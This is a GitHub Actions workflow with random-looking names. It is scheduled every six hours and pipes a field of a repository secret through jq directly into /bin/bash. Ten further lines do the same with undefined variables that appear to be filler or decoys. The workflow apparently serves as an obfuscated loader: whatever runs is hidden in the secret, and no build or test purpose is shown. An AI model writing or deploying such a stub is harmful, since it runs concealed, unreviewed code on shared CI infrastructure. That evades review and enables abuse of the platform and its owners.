name: tianzhongze9348

on:
  workflow_dispatch:
  schedule:
    - cron: '53 0/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: tianzhongze9348
        env:
          t5: ${{ secrets.t5 }}
        run: |
          echo $t5 | jq -r .kg45 | /bin/bash
          echo $tlrg093 | jq -r .lxjqg39742 | /bin/bash
          echo $iuo3501 | jq -r .tk1 | /bin/bash
          echo $sqf12288 | jq -r .rxk1852 | /bin/bash
          echo $s32685 | jq -r .rbx182 | /bin/bash
          echo $grtlr65 | jq -r .vpk2153 | /bin/bash
          echo $xo48 | jq -r .b04713 | /bin/bash
          echo $xgcgs2334 | jq -r .tzzwp25 | /bin/bash
          echo $zg62861 | jq -r .ismu9 | /bin/bash
          echo $o7 | jq -r .z16 | /bin/bash
          echo $xf21 | jq -r .bwg01247 | /bin/bash

